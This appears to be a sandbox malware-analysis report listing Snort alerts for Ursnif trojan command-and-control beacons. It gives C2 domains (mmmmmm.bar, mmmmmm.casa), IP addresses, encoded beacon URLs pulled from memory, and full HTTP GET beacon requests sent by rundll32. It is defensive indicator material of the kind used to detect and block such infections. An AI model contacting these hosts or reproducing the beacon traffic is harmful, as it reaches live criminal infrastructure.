            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49928 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49928 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49929 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49929 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49930 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49930 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49932 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49933 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49933 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49935 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49936 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49937 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49937 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49938 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49938 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49939 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49941 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49942 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49942 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49943 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49944 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49935 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49946 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49947 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49947 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49948 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49950 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49952 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49952 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49951 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49951 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49953 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49953 -> 31.41.45.66:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.45.66 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: mmmmmm.bar
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.mmmmmm.casa
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 162.255.119.219 80
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.212 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: mmmmmm.casa
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.216 80
            Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewIP Address: 198.54.117.210 198.54.117.210
            Source: SwFlsh32.dllString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000003.648054115.0000000003260000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.647465029.0000000003260000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.413679126.0000000000A62000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.481393127.0000000000A52000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.377498345.0000000003521000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.482170353.0000000003512000.00000004.00000001.sdmpString found in binary or memory: http://mmmmmm.bar
            Source: {5DB6AF90-73DB-11EC-90E5-ECF4BB2D2496}.dat.10.dr, ~DF584F6E0A1DD704BA.TMP.10.drString found in binary or memory: http://mmmmmm.bar/drew/1QOwg_2FLZb/YxejGgbNFeCdhh/1gjuax4E3bxF4PQuVvUoz/mWe6jb2568sC8c53/IkV5WVtme_2
            Source: ~DF2AF264C75EBCEA8B.TMP.45.dr, {AAFB84CF-73DB-11EC-90E5-ECF4BB2D2496}.dat.45.drString found in binary or memory: http://mmmmmm.bar/drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp
            Source: {99D3DE7D-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.drString found in binary or memory: http://mmmmmm.bar/drew/Ds1R78N_2Bgd/ksR5C2XbSKO/Yc7k5ktFVIid8i/gXsvixQHwiS_2FpA0dw3G/N_2Bpuch8xfCgVi
            Source: {787ACDA5-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.drString found in binary or memory: http://mmmmmm.bar/drew/EvNJYH1hit_2B/S_2FBSev/L6PRTXShrXbJ8nSbnHyL3kk/rxSkNCwe_2/FwMR5MuV_2Fgl3qPB/c
            Source: {787ACDA7-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.dr, ~DFEFA0E4FB69B66F60.TMP.20.drString found in binary or memory: http://mmmmmm.bar/drew/Htyh5S8h84hbP2LWKCnr_2B/LXaNEtu8OD/TOWxqpFfEELBfr4th/bCzBcRjTPZk7/6OgXjGc_2B_
            Source: loaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.869913578.00000000013F0000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BP
            Source: {787ACDA9-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.dr, ~DF5AFE25FDEA321026.TMP.20.drString found in binary or memory: http://mmmmmm.bar/drew/PO9bW3Zv_2F/_2BA0kAKy74fTr/CqVufIf_2Fqxsh0iMOJ18/ApdxCWlx7O_2BNfd/RKvgigiK9hD
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/QBjwt7f9IP4GJ_2FI3i/c0aa6REvsF1jEZ9Gt73OXW/MtCcAk2KHvQUZ/TFCEWwi_/2FYGGLslYtr
            Source: {99D3DE7F-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.dr, ~DFECE1085EE4C694FA.TMP.39.drString found in binary or memory: http://mmmmmm.bar/drew/QlXIpR0wndbmqlxV0/E1uaBwmWK3WR/XxTfKB75z9_/2F5qjg8wQ5TOnj/tny31CDfamMmuOmtnZ4
            Source: loaddll32.exe, 00000000.00000003.532745537.0000000001473000.00000004.00000001.sdmp, {8A934126-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.dr, ~DFB3283CE4740C455F.TMP.32.drString found in binary or memory: http://mmmmmm.bar/drew/UW7u_2BFcze6Mn2V_/2F_2Ft6gfpjU/ji7Rx8VjY5w/9WflMmm_2Fmqb8/zBvQVjE0mqHlUZGMuEX
            Source: {5DB6AF8E-73DB-11EC-90E5-ECF4BB2D2496}.dat.10.dr, ~DFBDA07BC0B99F7EB4.TMP.10.drString found in binary or memory: http://mmmmmm.bar/drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5a
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/X4p6u_2FetthGmAcz/bQsew8zG_2Fh/9P0GZIddIT6/tsqFDffw1JfZI9/7Wxh6S1430ERGHqXnGd
            Source: {5DB6AF8C-73DB-11EC-90E5-ECF4BB2D2496}.dat.10.dr, ~DF2E9EF23EC6AEF09A.TMP.10.drString found in binary or memory: http://mmmmmm.bar/drew/_2FqRGYaq3iNgnfYUBd/UHuyRkDahjgLnMh3n18sF3/AB_2B8MfNm8lr/WF50_2FD/4gDnApI5ztD
            Source: loaddll32.exe, 00000000.00000003.740005035.0000000001466000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/b2TutLAUt/AAkTh80PEBTPVx2M0WWz/tHvwOMh8DE9FVgCx1wM/pJTiDXRlbJxqfbcaYjX5Aq/xCQ
            Source: rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/eEhDmx0a4sdxsRnzPb9hc_2/BoO73Mi9GS/E9f2sOeyD62Bdbz85/pt5vTSpE5LaM/nbIIyujSEBL
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/hM1upiDM4s78JFaPrfyW/3DWkoBXDYr7rgMt3xG_/2BGXIAeEHHsslby_2Fk_2B/XjQKcdsES34ik
            Source: regsvr32.exe, 00000002.00000002.871888522.0000000003279000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/lQpAWLPQsOn/iwi15YGVBnOQpx/ACCjrHfe7Wo0P5JvKHDja/8dIy_2F3W_2F273e/h_2BsxpS6fp
            Source: rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/pqebeo2lGkpXDanz/ytpUleK_2FpNL5M/WaawzvJzKNJXUgj1ad/bF_2B89Mv/JS92dYGkqfVf3KA
            Source: rundll32.exe, 00000004.00000002.873683904.00000000051CB000.00000004.00000010.sdmpString found in binary or memory: http://mmmmmm.bar/drew/pqebeo2lkpXDanz/ytpUleK_2FpNL5M/WaawzvJKNJXUgj1ad/bF_2B89M
            Source: {99D3DE7B-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.drString found in binary or memory: http://mmmmmm.bar/drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtf
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.bar/drew/yX2jPs_2FJk7BOaoQtgEiU6/nNQbGh1LU5/204V5EdINWf_2Fd_2/Byf2ExfvNDDz/y_2Fb3qYGFh
            Source: regsvr32.exe, 00000002.00000003.603899610.0000000003260000.00000004.00000001.sdmpString found in binary or memory: http://mmmmmm.casa
            Source: rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/
            Source: rundll32.exe, 00000004.00000003.647377507.0000000003536000.00000004.00000001.sdmpString found in binary or memory: http://mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWls
            Source: rundll32.exe, 00000004.00000002.872832088.0000000003522000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNo
            Source: ~DF8B1684F7EAB925CF.TMP.32.dr, {8A934128-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.drString found in binary or memory: http://mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3Hv
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9teP
            Source: {8A93412C-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.dr, ~DF6BE4FBC691CAB6A8.TMP.32.drString found in binary or memory: http://mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR
            Source: loaddll32.exe, 00000000.00000003.595053007.0000000001473000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.594959193.0000000001473000.00000004.00000001.sdmp, ~DF635DEF1629836875.TMP.39.dr, {99D3DE79-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.drString found in binary or memory: http://mmmmmm.casa/drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6e
            Source: regsvr32.exe, 00000002.00000002.871888522.0000000003279000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7s
            Source: loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/e
            Source: loaddll32.exe, 00000000.00000002.871350910.00000000034EA000.00000004.00000010.sdmpString found in binary or memory: http://mmmmmm.casa/drew/XywyoiTttJTDU8v/K3707uO1SfrgHYPfXh/Csk9b4vhf/8V4G3vJbaghQgc
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/id
            Source: rundll32.exe, 00000004.00000002.872832088.0000000003522000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ_2B/
            Source: rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0re
            Source: ~DFE80EA9EDE4764E6F.TMP.32.dr, {8A93412A-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.drString found in binary or memory: http://mmmmmm.casa/drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzP
            Source: {787ACDA3-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.drString found in binary or memory: http://mmmmmm.casa/drew/mcyTA6nYo7I3Lz/Gg0KywBZ6ZMcybQpO6oFh/a_2Bz7Cxc8W0bVI_/2BZNTvU_2FIySan/m_2FNy
            Source: loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpString found in binary or memory: http://mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_
            Source: SwFlsh32.dllString found in binary or memory: http://ocsp.thawte.com0
            Source: SwFlsh32.dllString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: SwFlsh32.dllString found in binary or memory: http://s.symcd.com06
            Source: SwFlsh32.dllString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: SwFlsh32.dllString found in binary or memory: http://s2.symcb.com0
            Source: SwFlsh32.dllString found in binary or memory: http://sv.symcb.com/sv.crl0W
            Source: SwFlsh32.dllString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: SwFlsh32.dllString found in binary or memory: http://sv.symcd.com0&
            Source: SwFlsh32.dllString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: SwFlsh32.dllString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: SwFlsh32.dllString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: SwFlsh32.dllString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: SwFlsh32.dllString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: SwFlsh32.dllString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: SwFlsh32.dllString found in binary or memory: http://www.macromedia.com
            Source: loaddll32.exe, 00000000.00000003.740049295.000000000147F000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.871455463.000000000323B000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.693044334.0000000000A4F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/
            Source: loaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BP
            Source: loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/ZZq/Ef7PDUJU5SDC1JS1Awcb
            Source: rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/5Ri1
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYk
            Source: rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZ
            Source: rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I
            Source: regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0
            Source: loaddll32.exe, 00000000.00000003.740005035.0000000001466000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0K
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7
            Source: rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ
            Source: rundll32.exe, 00000003.00000003.693044334.0000000000A4F000.00000004.00000001.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZ
            Source: loaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtC
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/f7
            Source: rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casa/x
            Source: rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpString found in binary or memory: http://www.mmmmmm.casaEF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkd
            Source: SwFlsh32.dllString found in binary or memory: http://www.symauth.com/cps0(
            Source: SwFlsh32.dllString found in binary or memory: http://www.symauth.com/rpa00
            Source: SwFlsh32.dllString found in binary or memory: https://d.symcb.com/cps0%
            Source: SwFlsh32.dllString found in binary or memory: https://d.symcb.com/rpa0
            Source: SwFlsh32.dllString found in binary or memory: https://d.symcb.com/rpa0.
            Source: unknownDNS traffic detected: queries for: mmmmmm.bar
            Source: global trafficHTTP traffic detected: GET /drew/_2FqRGYaq3iNgnfYUBd/UHuyRkDahjgLnMh3n18sF3/AB_2B8MfNm8lr/WF50_2FD/4gDnApI5ztDswQT6fjW65Rc/8MlMyqf40d/OYMqyhdyGd1vn8BC_/2FCmHGeoqK5H/6a3W2Hnh7_2/FTBT4tro82LZZK/jBx_2BoXi6bJAkOt7vlQn/kou7T2J7XWftNrQG/syM1ToxLg0h4e74/4f8O3ZiP0I7VXDSeQS/TpcGBDm3s/sgldq9ogVR_2FlxXdUQt/h.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mmmmmm.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mmmmmm.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/1QOwg_2FLZb/YxejGgbNFeCdhh/1gjuax4E3bxF4PQuVvUoz/mWe6jb2568sC8c53/IkV5WVtme_2FISC/QrKvSVSdIRQPViUnPj/3Fw_2FGBy/ougDsh_2BOgImgeL_2FQ/ksdlSb4g_2Fwrah6M24/q_2B2b3zRP7YanP8WhJAas/H3R9cX2XSL2XN/g1is_2Fx/5fxgjLlEiN4fVMRrNvIC_2B/BMY9igRITe/bCdqDPjTj_2BNJVhj/TVNqqBqkq6Cf/FXwLJI8.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mmmmmm.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mmmmmm.barConnection: Keep-Alive
